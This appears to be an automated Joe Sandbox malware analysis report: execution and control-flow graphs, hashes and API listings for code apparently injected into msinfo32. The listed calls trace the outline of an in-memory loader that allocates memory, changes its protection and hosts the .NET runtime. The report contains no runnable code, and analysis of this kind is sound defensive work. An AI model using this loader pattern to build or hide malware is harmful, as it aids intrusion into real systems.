                execution_graph 4951 1aa1102119c 4977 1aa11022c44 4951->4977 4954 1aa11022c44 LoadLibraryA 4955 1aa110211d8 4954->4955 4956 1aa11022c44 LoadLibraryA 4955->4956 4957 1aa110211ee 4956->4957 4958 1aa11021200 VirtualAlloc 4957->4958 4965 1aa11021219 4957->4965 4959 1aa11021245 4958->4959 4958->4965 4960 1aa11022c44 LoadLibraryA 4959->4960 4959->4965 4962 1aa110212b9 4960->4962 4961 1aa11022c44 LoadLibraryA 4963 1aa11021310 4961->4963 4962->4963 4964 1aa110229b4 LoadLibraryA 4962->4964 4962->4965 4963->4961 4963->4965 4966 1aa11021350 4963->4966 4964->4962 4966->4965 4976 1aa110213d8 4966->4976 4997 1aa11020104 4966->4997 4968 1aa110214e9 5011 1aa110219a8 4968->5011 4969 1aa11021499 4969->4965 4990 1aa11020f28 4969->4990 4970 1aa110213ae 4971 1aa110213b2 4970->4971 4981 1aa11020230 4970->4981 4971->4965 4971->4970 4976->4965 4976->4968 4976->4969 4978 1aa11022c7b 4977->4978 4979 1aa110211c5 4978->4979 5021 1aa11020750 4978->5021 4979->4954 4982 1aa110229b4 LoadLibraryA 4981->4982 4983 1aa1102024e 4982->4983 4984 1aa11022a9c LoadLibraryA 4983->4984 4985 1aa11020263 4984->4985 4986 1aa110202ad 4985->4986 4987 1aa1102026b VirtualProtect 4985->4987 4986->4965 4986->4976 4987->4986 4988 1aa11020285 4987->4988 4989 1aa11020297 VirtualProtect 4988->4989 4989->4986 4991 1aa11020f65 CLRCreateInstance 4990->4991 4993 1aa11020f7e 4990->4993 4991->4993 4992 1aa1102102d 4992->4965 4993->4992 4994 1aa1102108b SysAllocString 4993->4994 4995 1aa1102105f 4993->4995 4994->4995 4995->4992 4995->4995 4996 1aa11021171 SafeArrayDestroy 4995->4996 4996->4992 4998 1aa110229b4 LoadLibraryA 4997->4998 4999 1aa11020123 4998->4999 5000 1aa1102012b 4999->5000 5001 1aa11022a9c LoadLibraryA 4999->5001 5000->4970 5002 1aa1102014a 5001->5002 5002->5000 5003 1aa1102016d VirtualProtect 5002->5003 5003->5000 5004 1aa1102018b 5003->5004 5005 1aa11020199 VirtualProtect 5004->5005 5006 1aa11022a9c LoadLibraryA 5005->5006 5007 1aa110201c1 5006->5007 5007->5000 5008 1aa110201dc VirtualProtect 5007->5008 5008->5000 5009 1aa110201f5 5008->5009 5010 1aa11020203 VirtualProtect 5009->5010 5010->5000 5012 1aa110219fc 5011->5012 5013 1aa110229b4 LoadLibraryA 5012->5013 5015 1aa11021e59 5012->5015 5016 1aa11022a9c LoadLibraryA 5012->5016 5020 1aa11022230 5012->5020 5013->5012 5014 1aa110229b4 LoadLibraryA 5014->5015 5015->5014 5017 1aa11022a9c LoadLibraryA 5015->5017 5018 1aa11021ef8 5015->5018 5016->5012 5017->5015 5018->5020 5025 1aa11022758 5018->5025 5020->4965 5022 1aa11020827 5021->5022 5023 1aa11020790 5021->5023 5022->4978 5023->5022 5024 1aa11020908 LoadLibraryA 5023->5024 5024->5022 5028 1aa11022794 5025->5028 5026 1aa11022990 5026->5020 5027 1aa11022a9c LoadLibraryA 5027->5028 5028->5026 5028->5027 4928 1aa11020173 VirtualProtect 4929 1aa1102012b 4928->4929 4930 1aa1102018b 4928->4930 4931 1aa11020199 VirtualProtect 4930->4931 4937 1aa11022a9c 4931->4937 4934 1aa110201dc VirtualProtect 4934->4929 4935 1aa110201f5 4934->4935 4936 1aa11020203 VirtualProtect 4935->4936 4936->4929 4938 1aa11022ad2 4937->4938 4940 1aa110201c1 4937->4940 4938->4940 4941 1aa11020908 4938->4941 4940->4929 4940->4934 4942 1aa1102094b 4941->4942 4943 1aa11020974 4941->4943 4942->4943 4945 1aa11020984 4942->4945 4946 1aa11022a9c LoadLibraryA 4942->4946 4943->4945 4947 1aa110229b4 4943->4947 4945->4940 4946->4942 4949 1aa110229d2 4947->4949 4948 1aa11022a7d LoadLibraryA 4950 1aa11022a85 4948->4950 4949->4948 4949->4950 4950->4945

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 100 1aa1102119c-1aa110211f4 call 1aa11022c44 * 3 107 1aa11021226 100->107 108 1aa110211f6-1aa110211f9 100->108 110 1aa11021229-1aa11021244 107->110 108->107 109 1aa110211fb-1aa110211fe 108->109 109->107 111 1aa11021200-1aa11021217 VirtualAlloc 109->111 112 1aa11021245-1aa1102126e call 1aa110231c4 call 1aa110231e4 111->112 113 1aa11021219-1aa11021220 111->113 119 1aa110212aa-1aa110212c0 call 1aa11022c44 112->119 120 1aa11021270-1aa110212a4 call 1aa11022df8 call 1aa11022cb8 112->120 113->107 115 1aa11021222 113->115 115->107 119->107 126 1aa110212c6-1aa110212c7 119->126 120->119 129 1aa110214ff-1aa11021500 120->129 128 1aa110212cd-1aa110212d3 126->128 130 1aa11021310-1aa1102131b 128->130 131 1aa110212d5 128->131 132 1aa11021505-1aa11021516 129->132 134 1aa1102131d-1aa11021337 call 1aa11022c44 130->134 135 1aa11021350-1aa11021359 130->135 133 1aa110212d7-1aa110212d9 131->133 136 1aa11021518-1aa11021522 132->136 137 1aa11021549-1aa1102156a call 1aa110231e4 132->137 138 1aa110212db-1aa110212e1 133->138 139 1aa110212f2-1aa110212f4 133->139 156 1aa11021339-1aa11021340 134->156 157 1aa11021346-1aa1102134e 134->157 141 1aa1102137a-1aa11021383 135->141 142 1aa1102135b-1aa1102136b call 1aa110202c0 135->142 136->137 143 1aa11021524-1aa11021542 call 1aa110231e4 136->143 169 1aa1102156c 137->169 170 1aa11021570-1aa11021572 137->170 138->139 144 1aa110212e3-1aa110212f0 138->144 139->130 146 1aa110212f6-1aa1102130e call 1aa110229b4 139->146 141->132 145 1aa11021389-1aa11021393 141->145 142->132 158 1aa11021371-1aa11021378 142->158 143->137 144->133 144->139 152 1aa1102139d-1aa110213a4 145->152 153 1aa11021395-1aa11021396 145->153 146->128 160 1aa110213d8-1aa110213dc 152->160 161 1aa110213a6-1aa110213a7 152->161 153->152 156->129 156->157 157->134 157->135 158->152 165 1aa1102148f-1aa11021497 160->165 166 1aa110213e2-1aa1102140b 160->166 163 1aa110213a9 call 1aa11020104 161->163 168 1aa110213ae-1aa110213b0 163->168 171 1aa110214e9-1aa110214ef call 1aa110219a8 165->171 172 1aa11021499-1aa1102149f 165->172 166->132 181 1aa11021411-1aa1102142b call 1aa110231c4 166->181 174 1aa110213bf-1aa110213c2 call 1aa11020230 168->174 175 1aa110213b2-1aa110213b9 168->175 169->170 170->110 179 1aa110214f4-1aa110214fb 171->179 177 1aa110214a1-1aa110214a7 172->177 178 1aa110214b6-1aa110214c8 call 1aa11020f28 172->178 187 1aa110213c7-1aa110213c9 174->187 175->132 175->174 177->179 180 1aa110214a9-1aa110214b4 call 1aa1102245c 177->180 191 1aa110214da-1aa110214e7 call 1aa110209b8 178->191 192 1aa110214ca-1aa110214d5 call 1aa11021578 178->192 179->132 188 1aa110214fd 179->188 180->179 194 1aa1102142d-1aa11021430 181->194 195 1aa11021447-1aa1102148a 181->195 187->160 193 1aa110213cb-1aa110213d2 187->193 188->188 191->179 192->191 193->132 193->160 194->165 198 1aa11021432-1aa11021445 call 1aa11022f48 194->198 195->132 203 1aa1102148c-1aa1102148d 195->203 198->203 203->165
                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: AllocVirtual
                • String ID:
                • API String ID: 4275171209-0
                • Opcode ID: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
                • Instruction ID: 29225a52655ad5b157222ba98cef34e4dec4bb895dc519a426cca943b915cf4f
                • Opcode Fuzzy Hash: 08c3b473a1f7362871bcf2729fe2c144e163769adb635b581bed10db9dac86c4
                • Instruction Fuzzy Hash: 50C1D830B55B056BEBD8EA28C4917E9B3D9FF4A300F94416DD84AC3186DB38F902C683

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID: 3C_^
                • API String ID: 0-16156322
                • Opcode ID: f7994c2a565a72a3b7187d8e7170cb41405ece9f708a03134d81cea5b646cb3e
                • Instruction ID: 1ebc05f6cfae94a2bf637c156ca22d92ed1556645795efe673988711ff2c0480
                • Opcode Fuzzy Hash: f7994c2a565a72a3b7187d8e7170cb41405ece9f708a03134d81cea5b646cb3e
                • Instruction Fuzzy Hash: E2A14B57F0F6DA2FFB22ABB858760E97F50EF4526070940F7D4988B0E7DD18A9498350

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 374 7ffd9b895ce6-7ffd9b895cf3 375 7ffd9b895cf5-7ffd9b895cfd 374->375 376 7ffd9b895cfe-7ffd9b895dc7 374->376 375->376 379 7ffd9b895dc9-7ffd9b895dd2 376->379 380 7ffd9b895e33 376->380 379->380 382 7ffd9b895dd4-7ffd9b895de0 379->382 381 7ffd9b895e35-7ffd9b895e5a 380->381 388 7ffd9b895ec6 381->388 389 7ffd9b895e5c-7ffd9b895e65 381->389 383 7ffd9b895e19-7ffd9b895e31 382->383 384 7ffd9b895de2-7ffd9b895df4 382->384 383->381 386 7ffd9b895df6 384->386 387 7ffd9b895df8-7ffd9b895e0b 384->387 386->387 387->387 390 7ffd9b895e0d-7ffd9b895e15 387->390 392 7ffd9b895ec8-7ffd9b895f70 388->392 389->388 391 7ffd9b895e67-7ffd9b895e73 389->391 390->383 393 7ffd9b895e75-7ffd9b895e87 391->393 394 7ffd9b895eac-7ffd9b895ec4 391->394 403 7ffd9b895fde 392->403 404 7ffd9b895f72-7ffd9b895f7c 392->404 395 7ffd9b895e89 393->395 396 7ffd9b895e8b-7ffd9b895e9e 393->396 394->392 395->396 396->396 399 7ffd9b895ea0-7ffd9b895ea8 396->399 399->394 406 7ffd9b895fe0-7ffd9b896009 403->406 404->403 405 7ffd9b895f7e-7ffd9b895f8b 404->405 407 7ffd9b895f8d-7ffd9b895f9f 405->407 408 7ffd9b895fc4-7ffd9b895fdc 405->408 412 7ffd9b89600b-7ffd9b896016 406->412 413 7ffd9b896073 406->413 410 7ffd9b895fa1 407->410 411 7ffd9b895fa3-7ffd9b895fb6 407->411 408->406 410->411 411->411 414 7ffd9b895fb8-7ffd9b895fc0 411->414 412->413 415 7ffd9b896018-7ffd9b896026 412->415 416 7ffd9b896075-7ffd9b896106 413->416 414->408 417 7ffd9b896028-7ffd9b89603a 415->417 418 7ffd9b89605f-7ffd9b896071 415->418 424 7ffd9b89610c-7ffd9b89611b 416->424 419 7ffd9b89603c 417->419 420 7ffd9b89603e-7ffd9b896051 417->420 418->416 419->420 420->420 422 7ffd9b896053-7ffd9b89605b 420->422 422->418 425 7ffd9b89611d 424->425 426 7ffd9b896123-7ffd9b896188 call 7ffd9b8961a4 424->426 425->426 433 7ffd9b89618a 426->433 434 7ffd9b89618f-7ffd9b8961a3 426->434 433->434
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f04687290af5635f9e7d6dbb2ce68db51a36e5ca2cf0b9bed870b5408a49a0a6
                • Instruction ID: a1baa1e409a29f9a24cceba30c1601307996bd3e572ee8f549df986db1e93647
                • Opcode Fuzzy Hash: f04687290af5635f9e7d6dbb2ce68db51a36e5ca2cf0b9bed870b5408a49a0a6
                • Instruction Fuzzy Hash: B5F1A730609A8D8FEFA8DF28C855BE97BE1FF58310F04426EE85DC7295DB3499458B81

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 435 7ffd9b896a92-7ffd9b896a9f 436 7ffd9b896aaa-7ffd9b896b77 435->436 437 7ffd9b896aa1-7ffd9b896aa9 435->437 440 7ffd9b896b79-7ffd9b896b82 436->440 441 7ffd9b896be3 436->441 437->436 440->441 442 7ffd9b896b84-7ffd9b896b90 440->442 443 7ffd9b896be5-7ffd9b896c0a 441->443 444 7ffd9b896bc9-7ffd9b896be1 442->444 445 7ffd9b896b92-7ffd9b896ba4 442->445 450 7ffd9b896c76 443->450 451 7ffd9b896c0c-7ffd9b896c15 443->451 444->443 446 7ffd9b896ba6 445->446 447 7ffd9b896ba8-7ffd9b896bbb 445->447 446->447 447->447 449 7ffd9b896bbd-7ffd9b896bc5 447->449 449->444 452 7ffd9b896c78-7ffd9b896c9d 450->452 451->450 453 7ffd9b896c17-7ffd9b896c23 451->453 459 7ffd9b896d0b 452->459 460 7ffd9b896c9f-7ffd9b896ca9 452->460 454 7ffd9b896c25-7ffd9b896c37 453->454 455 7ffd9b896c5c-7ffd9b896c74 453->455 457 7ffd9b896c39 454->457 458 7ffd9b896c3b-7ffd9b896c4e 454->458 455->452 457->458 458->458 461 7ffd9b896c50-7ffd9b896c58 458->461 463 7ffd9b896d0d-7ffd9b896d3b 459->463 460->459 462 7ffd9b896cab-7ffd9b896cb8 460->462 461->455 464 7ffd9b896cba-7ffd9b896ccc 462->464 465 7ffd9b896cf1-7ffd9b896d09 462->465 469 7ffd9b896dab 463->469 470 7ffd9b896d3d-7ffd9b896d48 463->470 466 7ffd9b896cce 464->466 467 7ffd9b896cd0-7ffd9b896ce3 464->467 465->463 466->467 467->467 471 7ffd9b896ce5-7ffd9b896ced 467->471 473 7ffd9b896dad-7ffd9b896e85 469->473 470->469 472 7ffd9b896d4a-7ffd9b896d58 470->472 471->465 474 7ffd9b896d5a-7ffd9b896d6c 472->474 475 7ffd9b896d91-7ffd9b896da9 472->475 483 7ffd9b896e8b-7ffd9b896e9a 473->483 476 7ffd9b896d6e 474->476 477 7ffd9b896d70-7ffd9b896d83 474->477 475->473 476->477 477->477 479 7ffd9b896d85-7ffd9b896d8d 477->479 479->475 484 7ffd9b896e9c 483->484 485 7ffd9b896ea2-7ffd9b896f04 call 7ffd9b896f20 483->485 484->485 492 7ffd9b896f06 485->492 493 7ffd9b896f0b-7ffd9b896f1f 485->493 492->493
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 709e83757a98288041685c1906fad9a06d090676df0af9d4d8947482fa55d486
                • Instruction ID: aebf0a268f32b388ef86bfc9d022a1ecddbbe7a4cc906453d015e2e99270c1d2
                • Opcode Fuzzy Hash: 709e83757a98288041685c1906fad9a06d090676df0af9d4d8947482fa55d486
                • Instruction Fuzzy Hash: E8E1D570A08A8D8FEFA8DF28C8557E97BD1FF58350F14426EE85DC7295CB7499408781

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
                • Instruction ID: 15632717179bd6940e86a1a6c507d29fa8e15dbf7223345391a87a226243ab53
                • Opcode Fuzzy Hash: d24d4ce7223a552c1b01d238479d20a295a89e3d53a7350efd5ba8d12bfb46a0
                • Instruction Fuzzy Hash: 0531983174CB084FD798EE1898457A9B3DAEBC9720F50056EA84FC31CADE64ED0686C3

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
                • Instruction ID: 5ad799e95ae1f610757a5b27cdd0369412838ef8ae6a798a825b0edfb4b10337
                • Opcode Fuzzy Hash: f2b484dd179f3dd10506a7a62fe75bc60ed010a6cf5ae84582fe1852291c4020
                • Instruction Fuzzy Hash: 0021693174C7084BDB98E95CA855399B3D6EBC9710F50055EEC4FC32CADE64ED068683

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: AllocArrayCreateDestroyInstanceSafeString
                • String ID:
                • API String ID: 815377780-0
                • Opcode ID: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
                • Instruction ID: 012da2c86111752136fa79f51f78b3a8c59e51bbb332892a33bc8b2d7ebbcd13
                • Opcode Fuzzy Hash: dae33ee218254d575b2f885f916d6963ffe40f3360d10ef8a927e24c671039fc
                • Instruction Fuzzy Hash: 46819E34718B089FD7A8EF28C889BA6B7E4FF99301F50462D948AC7191DB34F505CB82

                Control-flow Graph

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: LibraryLoad
                • String ID: l
                • API String ID: 1029625771-2517025534
                • Opcode ID: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                • Instruction ID: ab8a8b0923e2793841a82b212f11cf8039ed24899fe19a9f464bf2987918310f
                • Opcode Fuzzy Hash: 1385f4a438fc17bb376d03bd0145f1e19b120c532c3e81762a8c516170bfbca4
                • Instruction Fuzzy Hash: 1331D430A59B854FE795DB2CC044766BBD9FFAA308F6446ACC0CAC7192D724D846C703

                Control-flow Graph

                APIs
                Memory Dump Source
                • Source File: 00000002.00000002.4156638612.000001AA11010000.00000040.00000400.00020000.00000000.sdmp, Offset: 000001AA11010000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_1aa11010000_msinfo32.jbxd
                Yara matches
                Similarity
                • API ID: ProtectVirtual$LibraryLoad
                • String ID:
                • API String ID: 895956442-0
                • Opcode ID: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
                • Instruction ID: d177b2e373750e6390818f0d434dd7d6d290fa1b173a9c80a06db6ad59063125
                • Opcode Fuzzy Hash: b17c4479f7010fd41cbad95f9fb04bd4be79ef02ed8fc175b75ead6b9ebb131e
                • Instruction Fuzzy Hash: 9411A531758B085BDBD4EB1898857AA73E5FFD9300F40056EAC4AC7289DE24ED45C783

                Control-flow Graph

                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID: VG_H
                • API String ID: 0-4292058142
                • Opcode ID: 64a67d5a08541ed6e2cf52501f57f73206ddfada8f3cf943b6290fa7ffe5eb2f
                • Instruction ID: 3bf4d3a0111248e721e205e774fa55ee4a6f66129b2e0dcb0e48547f31e59711
                • Opcode Fuzzy Hash: 64a67d5a08541ed6e2cf52501f57f73206ddfada8f3cf943b6290fa7ffe5eb2f
                • Instruction Fuzzy Hash: 9A313975B0A94D5FEF94EBB844696B97BE1EF8D310B0900BAD409D72A2DE289D418740

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 296 7ffd9b897465-7ffd9b8974aa 298 7ffd9b8974ac-7ffd9b8974b8 296->298 299 7ffd9b897507-7ffd9b89750c 298->299 300 7ffd9b8974ba-7ffd9b8974c0 298->300 303 7ffd9b89750d 299->303 300->299 301 7ffd9b8974c2-7ffd9b8974c4 300->301 304 7ffd9b8974cf-7ffd9b8974eb call 7ffd9b892a28 301->304 305 7ffd9b89750f-7ffd9b897516 303->305 307 7ffd9b8974f0-7ffd9b8974f2 304->307 308 7ffd9b897500-7ffd9b897505 307->308 309 7ffd9b8974f4-7ffd9b8974f7 307->309 308->305 309->299 310 7ffd9b8974f9-7ffd9b8974fc 309->310 310->298 311 7ffd9b8974fe 310->311 311->303
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID: d
                • API String ID: 0-2564639436
                • Opcode ID: c756afeed83f5f1828d4922a0917a71009bd1374e25d63b75a003f24a1e2d140
                • Instruction ID: 9dc0b28a6258343d39a457ef01c80f27386705bf29264d1ae78d7b7829e28134
                • Opcode Fuzzy Hash: c756afeed83f5f1828d4922a0917a71009bd1374e25d63b75a003f24a1e2d140
                • Instruction Fuzzy Hash: BE21F331D0D29A8FDF529BA4C8155E9BFF0EF4A310F0601BBD49ED71A2CB28954487A1

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 312 7ffd9b892010-7ffd9b8974aa 314 7ffd9b8974ac-7ffd9b8974b8 312->314 315 7ffd9b897507-7ffd9b89750c 314->315 316 7ffd9b8974ba-7ffd9b8974c0 314->316 319 7ffd9b89750d 315->319 316->315 317 7ffd9b8974c2-7ffd9b8974eb call 7ffd9b892a28 316->317 323 7ffd9b8974f0-7ffd9b8974f2 317->323 321 7ffd9b89750f-7ffd9b897516 319->321 324 7ffd9b897500-7ffd9b897505 323->324 325 7ffd9b8974f4-7ffd9b8974f7 323->325 324->321 325->315 326 7ffd9b8974f9-7ffd9b8974fc 325->326 326->314 327 7ffd9b8974fe 326->327 327->319
                Strings
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID: d
                • API String ID: 0-2564639436
                • Opcode ID: ce9c7fc1f72e4fdb091ab7bdaceb466654d0dca679109e57490e6d0ccffd5bbb
                • Instruction ID: 7f7f9878e2a7857ee9bdbc953f18884bd6a3816a6b58af2a145ba05ecd62ba52
                • Opcode Fuzzy Hash: ce9c7fc1f72e4fdb091ab7bdaceb466654d0dca679109e57490e6d0ccffd5bbb
                • Instruction Fuzzy Hash: C8119B75E0951E8AEF64ABE4C4156FDBEA0EF4C314F02053AD91EE31E1DF39A6404791

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 89363bce84953228bc87d9d513ea74dffc79aff1d34174c7b68bf7adbecdd93c
                • Instruction ID: 1b3788a03aeb71c94570fb238950632619c8ed655e838411771f58b14b252ebb
                • Opcode Fuzzy Hash: 89363bce84953228bc87d9d513ea74dffc79aff1d34174c7b68bf7adbecdd93c
                • Instruction Fuzzy Hash: A4816336A0D68E4FEB55DBA898656F87FB0EF9A310F0540BBD059C70E3DE282945CB11

                Control-flow Graph

                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b8963eda83297f42823005ee83aedc1c5cd48cd03df69290ba92cda445f2c70b
                • Instruction ID: 0b12b69a9a71d11dfab84152b2454307a8e7c7295af3ddfc0bcc40ffc28a665e
                • Opcode Fuzzy Hash: b8963eda83297f42823005ee83aedc1c5cd48cd03df69290ba92cda445f2c70b
                • Instruction Fuzzy Hash: 0CC17B31B0EA491FEB99EB7C84656BC7BD1EF99350B0505BED04AC72E6DE286C428740
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1ff8ac9cf09d7be91f1a54667ee9b61129fa731d768015fe33ecd0b4e8f3218b
                • Instruction ID: 9d3369bd989eb5d63426f587508a55a1920069245d17e2e8f8fc14519ad78ea2
                • Opcode Fuzzy Hash: 1ff8ac9cf09d7be91f1a54667ee9b61129fa731d768015fe33ecd0b4e8f3218b
                • Instruction Fuzzy Hash: 7F412D36A0D7895FE751D7B898711E87FB1EF8A260F0500F7D459CB0E3DD1829468B21
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 63a5baed2bf19e737da27e875e3433e117e1ecf4fdea3206978ef322c7dcfb55
                • Instruction ID: da1a6ca58f105e79f0ec498a73b284de2f6652d1d8e660eb24c2a6260cc273be
                • Opcode Fuzzy Hash: 63a5baed2bf19e737da27e875e3433e117e1ecf4fdea3206978ef322c7dcfb55
                • Instruction Fuzzy Hash: 6FC17C31B0EB891FEB59EB7C84656A87FD1EF99210B0505FED08AC72E6DD285C468740
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 190a4a9cc1b61acf698fc74b2c3b877df8945d09ad7124cca83958d54ac27347
                • Instruction ID: c963bae0af05bfeb4e00f3b76266639c3fbb4a1cd01fb15b370f6ea46ae6712d
                • Opcode Fuzzy Hash: 190a4a9cc1b61acf698fc74b2c3b877df8945d09ad7124cca83958d54ac27347
                • Instruction Fuzzy Hash: FCB1C670609A8D8FDF69DF28C8557E93BE1FF59350F04426EE84DC7292CA349945CB82
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 191484321d08023c2254fd32237ae85e278c66a0915d781578055cec278fec99
                • Instruction ID: c2c9052e635984eefea7bdaa86ada7e19762e966e801df9a7f181843dcaaf024
                • Opcode Fuzzy Hash: 191484321d08023c2254fd32237ae85e278c66a0915d781578055cec278fec99
                • Instruction Fuzzy Hash: AF716730F0EA4F4FEB65E7B848616A67FD0EF49350F4501BAD449C71E6D92CA84B8781
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: aa5d0ccf8ef42facbbabeb28916241e9100f947d314ff5277c21153245e14778
                • Instruction ID: a48ec75ca2c2c0b15bd33d374062e1d70da6648d6c09464f2c36cd54d98134f2
                • Opcode Fuzzy Hash: aa5d0ccf8ef42facbbabeb28916241e9100f947d314ff5277c21153245e14778
                • Instruction Fuzzy Hash: 5E710A31B1DA4D4FDB95EB788469BAD7BE1EF88350F05057DD00ED72A2CE68AC428B41
                Memory Dump Source
                • Source File: 00000002.00000002.4157752637.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_2_2_7ffd9b890000_msinfo32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: c7880793f23fb5e18e26c7c91d93bbf4e2ae064ee6fb5e98448036101f0a67e9
                • Instruction ID: 1428c41e79d4c95933e7fffcc937caedcbbbc7bd0e37c745b21425b90fb39b82
                • Opcode Fuzzy Hash: c7880793f23fb5e18e26c7c91d93bbf4e2ae064ee6fb5e98448036101f0a67e9
